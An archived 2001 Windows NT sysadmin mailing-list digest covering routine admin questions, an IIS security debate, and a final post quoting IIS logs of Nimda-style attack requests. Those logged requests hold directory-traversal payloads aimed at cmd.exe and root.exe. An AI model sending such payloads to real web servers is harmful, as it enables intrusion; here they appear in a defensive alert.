RE: Network Traffic
There is a freeware tool that is more than adequate for a lot of network monitoring tasks, its worth a look: http://www.ethereal.com And you cant beat the price. xylog -Original Message- From: Carlos Garcia-Moran [mailto:[EMAIL PROTECTED]] Sent: Friday, September 28, 2001 4:50 PM To: NT System Admin Issues Subject: Network Traffic Heyas! Can anyone suggest a good tool for network traffic monitoring? We have all HP Procurve Switches and use TopTools, but it doesn't seem that good (unless im just missing some config options). For example we wanted to track down a user that was pegging our T @ 97% utilization (he had 15 family guy downloads on morpheus at the same time) and TT did not tell us much. We finally tracked him down by using firewall logs...kind of time consuming Any good ideas Cheers Carlos Garcia-Moran Senior Network Engineer Athenahealth, INC 781.392.0157 Main 617.543.1701 Cell [EMAIL PROTECTED] Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Files keep disappearing from the winnt dir
Title: Message Try marking the files as read-only or set perms to readonly so you cant delete the files without reseting the perms. If it is a process (virus or otherwise) that is deleting the files it will fail. If the behavior continues you may need to replace the HD. xylog -Original Message-From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Friday, September 28, 2001 1:40 PMTo: NT System Admin IssuesSubject: RE: Files keep disappearing from the winnt dir I just ran an AV on the server. No virus. John -Original Message-From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]Sent: Friday, September 28, 2001 1:12 PMTo: NT System Admin IssuesSubject: RE: Files keep disappearing from the winnt dir AT service isn't running. No hands ever touch that server, it's in a locked cabinet only accessible by me, my access code, palm print and badge.. John -Original Message-From: Brian Steele [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 12:44 PMTo: NT System Admin IssuesSubject: Re: Files keep disappearing from the winnt dir WAG: Is the Task Scheduler running? Check to see if anyone's set anything nasty to run. Brian - Original Message - From: John Cesta - Lists To: NT System Admin Issues Sent: Friday, September 28, 2001 11:07 AM Subject: Files keep disappearing from the winnt dir I am having a sort of weird problem on one of my NT4.0 SP6a servers. A while back I had to clean the server - chkdsk - seemed to work ok. After that this problem keeps occurring. One day I noticed that the files - notany directories just files - in the c:\winnt directory were gone except for two of them. I copied the files from another identical NT box in to this server's winnt directory. A day or so later they were gone again. I copied them into the dir again, a day later they are gone. I KNOW that the server does not have any viruses. I can only figure that the server may have a corrupt file system and needs to be cleaned once more. Any suggestions? John CestaWant to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: cool signature
Right click and view HTML source: MARQUEE scrollAmount=20 scrollDelay=8 behavior=slide loop=1SPAN class=690504707-12062001James Blair/SPAN/MARQUEE/BBR/MARQUEB MARQUEE scrollAmount=20 scrollDelay=9 behavior=slide loop=1SPAN class=690504707-12062001Oil Company of Australia/SPAN/MARQUEE/BBR/MARQUE/MARQUEB MARQUEE scrollAmount=20 scrollDelay=11 behavior=slide loop=1SPAN class=294383405-14062001PC Support/SPAN/MARQUEE/BBR MARQUEE scrollAmount=20 scrollDelay=12 behavior=slide loop=1Phone: +61nbsp;SPAN class=690504707-120620017 3858 0628/SPAN/MARQUEE MARQUEE scrollAmount=20 scrollDelay=12 behavior=slide loop=1Fax: +61nbsp;SPAN class=690504707-120620017 3369 7840/SPAN/MARQUEE MARQUEE scrollAmount=20 scrollDelay=11 behavior=slide loop=1SPAN class=294383405-14062001e-/SPANmail:nbsp;SPAN class=690504707-12062001A href="mailto:[EMAIL PROTECTED]james.blair@upstream.SPAN" class=294383405-14062001originenergy.com/SPAN/A/SPAN/MARQUEE/DIV xylog -Original Message- From: Chris Kim [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 7:15 PM To: NT System Admin Issues Subject: cool signature Hey james, how did you make the cool signature? -Original Message- From: Blair, James [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 10:28 PM To: NT System Admin Issues Subject: RE: Is that a fake or what, can anyone help? Pavel, HOAX...goto...: http://vil.mcafee.com/hoax.asp For the latest viruses make your homepage: http://www.antivirus.com/vinfo/ http://vil.nai.com/villib/newvir.asp Pit the two against each other to see the Risk Rating if vastly different check a third one for clarification. James Blair Oil Company of Australia PC Support Phone: +617 3858 0628 Fax: +617 3369 7840 e-mail:[EMAIL PROTECTED] Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: IIS/DNS Question?
Title: Message What you want is a redirect at www.medaille.edu/hostnamethat sends you to abc.medaille.edu. A redirect takes the form of an HTML page that contains the following html code: %response.redirect "http://abc.medaille.edu" % This should do the trick. xylog -Original Message-From: Bob Chyka [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 12:21 PMTo: NT System Admin IssuesSubject: Re: IIS/DNS Question? yesthe main web server has a registered url...(www.medaille.edu) and off that url we want links to a page on a windows 2000 IIs box. the links are to ASP files on the server without a registered name. i was wondering how to program the syntax for the links in dreamweaver or whatever they are usingis it www.medaille.edu/hostname of 2000 box/xxx.asp? thanks for the help - Original Message - From: Michael Reid To: NT System Admin Issues Sent: Thursday, September 27, 2001 11:14 AM Subject: Re: IIS/DNS Question? Oh, you want an outside webserver to link to an internal page by chance? Michael - Original Message - From: Bob Chyka To: NT System Admin Issues Sent: Thursday, September 27, 2001 11:40 AM Subject: Re: IIS/DNS Question? i didi put a host record in the dns called abc and i can hit the server by typing abc.medaille.edu but the programmer needs to know how he should program a link off the main (medaille.edu) web page to hit the other server... i may be unclear..let me know.. - Original Message - From: Givens, Mike To: NT System Admin Issues Sent: Thursday, September 27, 2001 9:29 AM Subject: RE: IIS/DNS Question? One easy way is create a sub domain under your real one and have it point to the Win 2000 server. eg. www.somedomain.com eg. something.somedomain.com Then just setup the IIS as a regular web site and server. That way it appears that you never leave the original domain. Mike -Original Message-From: Bob Chyka [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 8:16 AMTo: NT System Admin IssuesSubject: IIS/DNS Question? Hello everyone, seeing if there is someone out there that can help me with this one because i am about to smash my head on the wall. we have a registered domain name (www.medaille.edu) for our school. our web page is being hosted on a Unix machine and our dns is windows 2000. we have developed an online application and inquiry form that we want to link off of www.medaille.edu, but this is on a windows 2000 server running IIS 5. the web guy is asking me how he should program the link. the new ASP pages on the 2000 box he wants to link directly to of www.medaille.edu. i put a host record in the dns server for the 2000 box, what else do i need to do or what should be the syntax of his link...pretty new to IIS when it comes to multiple servers. thanks for any feedback, Bob C.Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Ghost 2002 Suggestions
Well actually with sysprep you can use Windows 2000's Plug and Play feature to create a single image for all hardware builds. Just don't forget to use sysprep -pnp to enable this capability. xylog -Original Message- From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 11:27 AM To: NT System Admin Issues Subject: RE: Ghost 2002 Suggestions First off, you don't use Ghost 2002 in an enterprise. That is a single user/single PC version. You need Ghost 7 Enterprise. As for the IDE issue, you will need to test it and see. But the general rule of thumb is you make different images for different HW. -Original Message- From: Roger Ali [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 8:01 AM To: NT System Admin Issues Subject: Ghost 2002 Suggestions Hey all, My supervisors would like us to push Windows 2000 Images to Dells, Compaqs, and HPs down to our users' desktops. The problem is we're not AD so I can't use RIS. We got a suggestion to use Ghost for this purpose. My question is can I make an image on Ghost 2002 of a Dell and push it to a Compaq without getting a BSOD because of the IDE Configurations, can Ghost redetect the devices and then just add it to the registry or something. Also will it prompt me for a name for the machine to have instead of using a duplicate? I just wanted to check if Ghost has this functionality before we invest and waste money. Thanks Roger Ali Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: OWA
Title: OWA Not necessarily. If you use Windows Integrated Authentication on your IIS box then the passwords are encrypted. If you use basic authentication then passwords are sent in clear text. xylog -Original Message- From: Neil Harvey [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 4:52 AM To: NT System Admin Issues Subject: Re: OWA I might be being blonde here but does that mean that if OWA and Exchange are running on the same server then the passwords are encrypted? - Original Message - From: [EMAIL PROTECTED] To: NT System Admin Issues Sent: Tuesday, September 25, 2001 6:51 PM Subject: RE: OWA Yes, First its has be loaded on a web server of course, Then load Exchange admin on the web server you want to run OWA. Then Load OWA on web server. The only bad thing to loading OWA on a different machine is that your Passwords will be sent in clear text unless its a Domain Controller. STG1(SW) Kirk Etchberger COMREGSUPPGRU MAYPORT FL SERMC AIS LPO [EMAIL PROTECTED] TEL: 904-270-5126 EXT 3119 DSN: 312-960-5126 EXT 3119 MCSE, MCSD, CCNA Is anyone running OWA on a different server than Exchange 5.5? If yes, what procedures did you take? After getting hit with the Nimda virus, I had to reformat the hard drive and reinstall patches. I have not been able to get OWA installed on that server I keep receiving an error message when trying to install OWA Failed to remove OWA . The specified file cannot be found, Microsoft NT ID No: ox00c2. Cassandra Cody, MCSE Missouri Botanical Garden See the World 314-577-0813 [EMAIL PROTECTED] Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: W2K Time service issues
Try synch'ing the time up on all DC's.: Net time \\pdc /s /y This should eliminate the error. Reason being is that kerberos will not authenticate a machine that has time synch off by some value I forget the exact amount but I think it on the order of a few seconds if not less. This is why Win2k has a time service built in. You need to configure it though, try this: net stop time w32tm -once -v this will show you a single time synch as it progresses. You probably want to synch your PDC with an internet time server like this: net time /setsntp:ntp2.usno.navy.mil and synch the other DC's and client stations with you PDC. Hope this helps. xylog -Original Message- From: Schaub, Chris [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 7:49 AM To: NT System Admin Issues Subject: W2K Time service issues Starting about a month ago we started to receive the following errors on DC's throughout our enterprise: 1st error Event Type: Warning Event Source: w32time Event Category: None Event ID: 56 Date: 9/25/2001 Time: 8:20:16 AM User: N/A Computer: ServerY Description: The Domain Controller Server X in tld.domain.com returned an incorrectly signed time stamp. If this DC is from the machine's parent domain then the trust link between the domains may be broken and must be fixed. If the DC is from this machine's own domain, then the machine password for this machine is incorrect and should be corrected. Data: : e5 03 00 00 å... 2nd error Event Type: Warning Event Source: w32time Event Category: None Event ID: 11 Date: 9/25/2001 Time: 8:20:21 AM User: N/A Computer: ServerY Description: The NTP server \\Serverx.tld.domain.com didn't respond Data: : 00 00 00 00 We see this problem when a lower level server (Servery.2ld.tld.domain.com) tries to sync off of the server (serverx.tld.domain.com). So basically the child domain DC is trying to sync with a parent level DC and getting these errors. NTP on the parent level domain controller seems to be working for manual calls for other clients. Also the trust between the two domains seems to be intact. And it is happening on multiple servers in both domains. Also this did use to work before a month ago. If anyone has some insight. Thanks, Chris Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: NT4 Registry entry for SP level ?
Try : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion xylog -Original Message- From: Chris Bodnar [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 10:42 AM To: NT System Admin Issues Subject: NT4 Registry entry for SP level ? Does anyone know the exact subkey and value that contains the service pack level for NT 4 ? Im writing a KixTart script and I need to retrieve that value. TIA Chris Bodnar The Lehigh Group 610-966-9702 X:134 Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: software/patch push to 9x clients
Do you have login scripts? You can run the patches from a shared network drive called when users login. I such a script but it is for Windows 2000. xylog -Original Message- From: Stephen-Paul Yelland [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 11:59 AM To: NT System Admin Issues Subject: software/patch push to 9x clients I have 2 win2k servers one for file and print and one for backup, ras and anti-virus. I have approx 250 users spread across the County. Visiting each and every pc is not the preferred method of software Installs. I have been able to get an admin distro. of office 2k and Script the install. MS made that easy but to push all of these MS Patches and others I am looking for a way to push the install/setup to each of the win9x clients with out expending large amounts of School Districts monies to buy 3rd party solution. Like SMS and any of the Other software distro app. Any and all help would be greatly appreciated Stephen-Paul Yelland Miami County Educational Service Center Troy OH Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Aggregating Intel Pro 100 cards
Yes but you need the latest updated drivers not the ones that ship with Win2k. xylog -Original Message- From: Dewar Charles R [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 1:08 PM To: NT System Admin Issues Subject: Aggregating Intel Pro 100 cards Has anyone installed and aggregated multiple Intel Pro 100 cards on a W2K Server? (Dell Poweredge 4400) Charles R. Dewar Systems Administrator North Hills Hospital Phone: 817.255.1777 Toll-free Fax: 866.947.3756 Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: NT 4.0 Profiles event ID 1000
Three things I would check: 1.Disk Space on network profile area 2.permissions 3.Domain structure and User.dat registry permissions xylog -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 6:28 PM To: NT System Admin Issues Subject: NT 4.0 Profiles event ID 1000 NT 4.0, SP6a. In the %SystemRoot%\Profiles directory on two of my servers, a TON of directories called system.### and temp.### keep getting created. I assume it has something to do with the event ID 1000's[1] that I am getting in the event logs, but I have not been able to find any useful information on TechNet to get rid of the problem. I have checked the things mentioned in Q185198 Q189119. [1] Source: Userenv; Description: Your profile was not successfully loaded, but you have been logged on with the default system profile. Please correct the problem and log off. Source: Userenv; Description: The operating system was unable to create a temporary profile directory. Please contact your network administrator. Thanks, Michelle http://www.sunbelt-software.com/ntsysadmin_list_charter.htm Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english
RE: WFP settings
SFC.exe ??? -Original Message- From: Joe L. Casale [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 25, 2001 11:49 AM To: NT System Admin Issues Subject: WFP settings Does anyone remember the util to configure WFP in 2k? I thought I saw it in win2kmag, but cant find it. jlc Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english
RE: IIS check this out
This is just plain wrong. Apache has a larger market share than IIS. IIS is gaining in leaps and bounds but is not and has never been the market leader. Here is a link if you don't believe me: http://www.netcraft.com/survey/ Apache is more secure, Apache has been more secure before IIS was a blip on the radar. People target IIS not because it is what the majority of people use but because it has more vulnerabilities. Granted there are a large number of IIS boxes to target but that is not the problem. It is just avoiding the core issue. MS has a problem delivering software that is secure out of the box. This is the problem and always will be until give security a higher priority than adding new features to sell software. The reality is that this will never happen because the only thing that motivates MS is money and that means selling the latest versions of there software. xylog -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 25, 2001 12:42 PM To: NT System Admin Issues Subject: RE: IIS check this out Wow, that's pretty harsh. However, don't you think if everyone ditched IIS and moved to something else like Apache, then the bad guys would just start targeting Apache. If your goal is to bring sites down, then you get the most bang for you buck by targeting IIS. Along the same lines, most viruses target PCs and not MACs. After the Nimda virus someone on one of the lists I'm on suggested that Nimda was another example of why people should switch to MACs. Sorry, it will be a cold day in Osama's soon to be new home before I do that. ;-) -Original Message- From: Luke Brumbaugh [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 25, 2001 7:47 AM To: NT System Admin Issues Subject: OT:IIS check this out This looks pretty bad for the home team. As of resent events, I have been working over. Unfortunately I am salary, if I was hourly, I would probably be in a significantly higher tax bracket. http://www.theregister.co.uk/content/4/21853.html Enterprise Channel Management Software for Manufacturers Visit us at http://www.ultryx.com Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext _mode=0lang=english Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext _mode=0lang=english Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english
RE: Blue screen (ntoskrnl)
On each server create a scheduled daily job to run rdisk /s- this will update the ERD info in %systemroot%\repair without creating the ERD floppy. Now copy the %systemroot%\repair from each server to a central network share. The great thing is this will work for Win2K too, just copy rdisk.exe from an NT machine to you Win2K box and your done. xylog -Original Message- From: Krueger, Aaron G. - Lonesome [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 25, 2001 2:09 PM To: NT System Admin Issues Subject: RE: Blue screen (ntoskrnl) I once saw a script (that unfortunately I failed to keep) that would go to each server specified in a listing, and copy/create the ERD stuff to a central location, such that you could create an ERD for any server in the event that it went down. All that without any manual intervention (other than verifying and creating the physical floppy in the event). Anyone come across anything similar and 'free'? Aaron G. Krueger Sr. Network Analyst -Original Message- From: Don Collier (Intermap Denver) [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 25, 2001 12:02 PM To: NT System Admin Issues Subject: RE: Blue screen (ntoskrnl) I would like to see that batch file. _ Don Collier Network Administrator Intermap Technologies Inc. Voice: 303-708-0955 x-207 Fax:303-708-0952 [EMAIL PROTECTED] www.intermaptechnologies.com -Original Message- From: Clark, Steve [mailto:[EMAIL PROTECTED]] Sent: Saturday, September 22, 2001 4:40 PM To: NT System Admin Issues Subject: RE: Blue screen (ntoskrnl) Nice - welcome to the new company! I've got a batch process to create ERD's automatically if you're interested. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Stephen Moreau [mailto:[EMAIL PROTECTED]] Sent: Saturday, September 22, 2001 6:46 PM To: NT System Admin Issues Subject: Re: Blue screen (ntoskrnl) Thanks for the info but I recently took over these servers (the admin before me quit) and he didn't maintain the erd. I tried the emergency repair process and told the process to look on the harddrives but it didn't work. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext _mod e=0lang=english Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext _mode=0lang=english Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english
RE: IP Scanner that finds unused IPs?
This tool can scan a class c network in seconds: http://www.angryipscanner.com/ xylog -Original Message- From: Shower, David [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 25, 2001 11:22 AM To: NT System Admin Issues Subject: IP Scanner that finds unused IPs? Looking for a tool that will scan my Class C and report which IPs are currently NOT in use. Have found plenty of tools that report what is live. Anyone have a tool like that? Want to use it to verify available static IP addresses. David Shower Senior IS Engineer Lockheed Martin Distribution Technologies http://www.lmdtech.com Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext _mode=0lang=english Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english
RE: RE: IIS check this out
No one said you should swith to Apache. I use IIS at home and at work. The point is Apache has managed to do a good job with security and IIS has not. I think this speaks to the power of open source development and the shortfalls of a Microsoft software monopoly. xylog -Original Message- From: Diane Beckham [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 25, 2001 2:31 PM To: NT System Admin Issues Subject: OT: RE: IIS check this out Yes MS is out to make money, that is a good thing. OHHH, I feel a rant coming on However, most small companies who use IIS (and got both viruses and don't know to patch and secure their web servers) are NOT the persons who will switch to Apache. Heck, they don't even understand Windows 9x or Win2K let alone IIS. How in the world will they be able to setup an Apache web server? It won't happen. People use MS's products cuz they are easy to use, and any fool can load the OS (not correctly or securely, mind you). IIS installs itself (not correctly or securely mind you) but any fool can do it. AND it comes free with Win2K! No, the only people who will think to switch to Apache are the IIS people who already are relatively secure and keep up with the security issues and they don't need to. No we really need knowledgeable people to keep after MS to keep them patching as quickly as possible. If the good people all abandon MS and IIS, only those who don't know anything will keep it, and nothing will change. People don't switch from MS now, because everything is so convenient. Heck I get grief just asking people to log off their computers when they go home or change they passwords regularly. What, you say, ask them to have a 6-14 digit password with lower, upper and special characters? That would be too incontinent! True, MS needs to tighten their security measures however, all the end-users will bit*h and complain. People want security but they don't want it at the expense of their convenience. I guess I'm done now...back to your regularly scheduled ON Topic program... Diane -Original Message- From: xylog [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 25, 2001 10:51 AM To: NT System Admin Issues Subject: RE: IIS check this out This is just plain wrong. Apache has a larger market share than IIS. IIS is gaining in leaps and bounds but is not and has never been the market leader. Here is a link if you don't believe me: http://www.netcraft.com/survey/ Apache is more secure, Apache has been more secure before IIS was a blip on the radar. People target IIS not because it is what the majority of people use but because it has more vulnerabilities. Granted there are a large number of IIS boxes to target but that is not the problem. It is just avoiding the core issue. MS has a problem delivering software that is secure out of the box. This is the problem and always will be until give security a higher priority than adding new features to sell software. The reality is that this will never happen because the only thing that motivates MS is money and that means selling the latest versions of there software. xylog -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 25, 2001 12:42 PM To: NT System Admin Issues Subject: RE: IIS check this out Wow, that's pretty harsh. However, don't you think if everyone ditched IIS and moved to something else like Apache, then the bad guys would just start targeting Apache. If your goal is to bring sites down, then you get the most bang for you buck by targeting IIS. Along the same lines, most viruses target PCs and not MACs. After the Nimda virus someone on one of the lists I'm on suggested that Nimda was another example of why people should switch to MACs. Sorry, it will be a cold day in Osama's soon to be new home before I do that. ;-) -Original Message- From: Luke Brumbaugh [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 25, 2001 7:47 AM To: NT System Admin Issues Subject: OT:IIS check this out This looks pretty bad for the home team. As of resent events, I have been working over. Unfortunately I am salary, if I was hourly, I would probably be in a significantly higher tax bracket. http://www.theregister.co.uk/content/4/21853.html Enterprise Channel Management Software for Manufacturers Visit us at http://www.ultryx.com Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext _mode=0lang=english Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english
RE: Nimda - Thought we were protected
Did you patch you browsers?? xylog -Original Message- From: Frank Ouimette [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 11:11 AM To: NT System Admin Issues Subject: RE: Nimda - Thought we were protected Could it be an issue with Novell instead of Microsoft? Just a thought. Frank Ouimette Chief Information Officer FreeYankee, Inc. Phone - 801.553.9381 Fax - 801.553.9338 -Original Message- From: Steve Kelsay [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 8:35 AM To: NT System Admin Issues Subject: Nimda - Thought we were protected First alert, Maybe nothing. We just had our developer machines, running NT2000 Server hit with Nimda. The strange thing is, we have Nimda protection in our email scanner, and all the security fixes MS said should be applied. SP2 is installed. The machines boot up, a log in screen displays, and they login. The Novell login script begins to run as normal ( we run mixed network, NT and Novell), then the login script box clears as normal, a blue screen appears as normal, and nothing further happens. Could this be a new strain? Steve Kelsay Network Administration Group South Carolina Department of Revenue 301 Gervais Street Columbia, SC 29201 (803) 898-5522 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
WARNING: Hacker Alert
All my public facing web servers at home and at my office have shown a huge continuous hacking activity. Has anyone seen similar? I fear this may be code red related or automated. Please comment if you have seen similar. Here is an excerpt from one logfile: 63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe , /c+dir, 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/..Á ../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -, 9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 15, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:06, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, 